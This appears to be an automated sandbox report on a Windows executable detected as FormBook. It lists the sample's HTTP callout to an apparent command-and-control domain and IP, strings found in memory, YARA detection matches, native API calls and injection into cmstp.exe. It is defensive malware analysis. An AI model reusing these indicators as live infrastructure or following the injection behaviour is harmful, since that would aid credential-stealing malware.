HTTP traffic detected: GET /blm/?v4=jT8U/4hmrcCGqX5zF6RLU3xaP16cys1ENKtgh6K33uf7HOVcxmeLoGjIinA45QceqzYG68+/fQ==&Jr=V48DzvNH HTTP/1.1Host: www.kompramania.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.54.117.212 198.54.117.212

Source: global traffic

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246739537.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000002.524154545.000000000686B000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: w73FtMA4ZTl9NFm.exe	String found in binary or memory: https://github.com/unguest
Source: w73FtMA4ZTl9NFm.exe	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419D50 NtCreateFile,	3_2_00419D50
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419E00 NtReadFile,	3_2_00419E00
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419E80 NtClose,	3_2_00419E80
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419F30 NtAllocateVirtualMemory,	3_2_00419F30
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419D4A NtCreateFile,	3_2_00419D4A
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419DFA NtReadFile,	3_2_00419DFA
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419E7A NtClose,	3_2_00419E7A
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00419F2A NtAllocateVirtualMemory,	3_2_00419F2A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04639860
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639840 NtDelayExecution,LdrInitializeThunk,	7_2_04639840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639540 NtReadFile,LdrInitializeThunk,	7_2_04639540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_04639910
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046395D0 NtClose,LdrInitializeThunk,	7_2_046395D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046399A0 NtCreateSection,LdrInitializeThunk,	7_2_046399A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04639660
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639A50 NtCreateFile,LdrInitializeThunk,	7_2_04639A50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639650 NtQueryValueKey,LdrInitializeThunk,	7_2_04639650
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046396E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_046396E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046396D0 NtCreateKey,LdrInitializeThunk,	7_2_046396D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639710 NtQueryInformationToken,LdrInitializeThunk,	7_2_04639710
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639FE0 NtCreateMutant,LdrInitializeThunk,	7_2_04639FE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639780 NtMapViewOfSection,LdrInitializeThunk,	7_2_04639780
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0463B040 NtSuspendThread,	7_2_0463B040
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639820 NtEnumerateKey,	7_2_04639820
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046398F0 NtReadVirtualMemory,	7_2_046398F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046398A0 NtWriteVirtualMemory,	7_2_046398A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639560 NtWriteFile,	7_2_04639560
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639950 NtQueueApcThread,	7_2_04639950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639520 NtWaitForSingleObject,	7_2_04639520
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0463AD30 NtSetContextThread,	7_2_0463AD30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046395F0 NtQueryInformationFile,	7_2_046395F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046399D0 NtCreateProcessEx,	7_2_046399D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639670 NtQueryInformationProcess,	7_2_04639670
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639A20 NtResumeThread,	7_2_04639A20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639A00 NtProtectVirtualMemory,	7_2_04639A00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639610 NtEnumerateValueKey,	7_2_04639610
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639A10 NtQuerySection,	7_2_04639A10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639A80 NtOpenDirectoryObject,	7_2_04639A80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639760 NtOpenProcess,	7_2_04639760
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639770 NtSetInformationFile,	7_2_04639770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0463A770 NtOpenThread,	7_2_0463A770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639730 NtQueryVirtualMemory,	7_2_04639730
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04639B00 NtSetValueKey,	7_2_04639B00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0463A710 NtOpenProcessToken,	7_2_0463A710
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046397A0 NtUnmapViewOfSection,	7_2_046397A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0463A3B0 NtGetContextThread,	7_2_0463A3B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699D50 NtCreateFile,	7_2_00699D50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699E00 NtReadFile,	7_2_00699E00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699E80 NtClose,	7_2_00699E80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699F30 NtAllocateVirtualMemory,	7_2_00699F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699D4A NtCreateFile,	7_2_00699D4A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699DFA NtReadFile,	7_2_00699DFA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699E7A NtClose,	7_2_00699E7A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00699F2A NtAllocateVirtualMemory,	7_2_00699F2A

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_033BC3A0	1_2_033BC3A0
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_033BA758	1_2_033BA758
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C146484	1_2_0C146484
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C141CC8	1_2_0C141CC8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C1417F8	1_2_0C1417F8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C148B30	1_2_0C148B30
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C141CB7	1_2_0C141CB7
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C146503	1_2_0C146503
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C145EB3	1_2_0C145EB3
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C145EB8	1_2_0C145EB8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C140F10	1_2_0C140F10
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C140F09	1_2_0C140F09
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C141FB0	1_2_0C141FB0
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C141FAD	1_2_0C141FAD
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C1417E8	1_2_0C1417E8
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C143823	1_2_0C143823
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C1408D3	1_2_0C1408D3
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C140908	1_2_0C140908
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C143205	1_2_0C143205
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C143208	1_2_0C143208
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C1462B0	1_2_0C1462B0
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 1_2_0C1462AD	1_2_0C1462AD
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041DB46	3_2_0041DB46
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041D357	3_2_0041D357
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041D5DD	3_2_0041D5DD
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00409DEB	3_2_00409DEB
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041DE05	3_2_0041DE05
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00409E30	3_2_00409E30
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041DE9C	3_2_0041DE9C
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041D701	3_2_0041D701
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_0041DFE3	3_2_0041DFE3
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1002	7_2_046B1002
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460841F	7_2_0460841F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C28EC	7_2_046C28EC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C20A8	7_2_046C20A8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460B090	7_2_0460B090
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C1D55	7_2_046C1D55
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04614120	7_2_04614120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FF900	7_2_045FF900
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C2D07	7_2_046C2D07
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F0D20	7_2_045F0D20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460D5E0	7_2_0460D5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C25DD	7_2_046C25DD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622581	7_2_04622581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04616E30	7_2_04616E30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C2EF7	7_2_046C2EF7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C22AE	7_2_046C22AE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C2B28	7_2_046C2B28
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C1FF1	7_2_046C1FF1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BDBD2	7_2_046BDBD2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462EBB0	7_2_0462EBB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069DB46	7_2_0069DB46
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00689DEB	7_2_00689DEB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069D5D7	7_2_0069D5D7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00682D90	7_2_00682D90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00689E30	7_2_00689E30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069DE05	7_2_0069DE05
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069DE9C	7_2_0069DE9C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069D702	7_2_0069D702
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0069DFE3	7_2_0069DFE3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_00682FB0	7_2_00682FB0

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: String function: 045FB150 appears 35 times

Source: w73FtMA4ZTl9NFm.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: w73FtMA4ZTl9NFm.exe	Binary or memory string: OriginalFilename vs w73FtMA4ZTl9NFm.exe
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs w73FtMA4ZTl9NFm.exe
Source: w73FtMA4ZTl9NFm.exe, 00000001.00000003.241311005.0000000004753000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs w73FtMA4ZTl9NFm.exe
Source: w73FtMA4ZTl9NFm.exe	Binary or memory string: OriginalFilename vs w73FtMA4ZTl9NFm.exe
Source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.288143631.0000000001910000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameCMSTP.EXE` vs w73FtMA4ZTl9NFm.exe
Source: w73FtMA4ZTl9NFm.exe, 00000003.00000002.287846325.00000000016BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs w73FtMA4ZTl9NFm.exe
Source: w73FtMA4ZTl9NFm.exe	Binary or memory string: OriginalFilenameImporterCallback.exe6 vs w73FtMA4ZTl9NFm.exe

Source: w73FtMA4ZTl9NFm.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe

Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
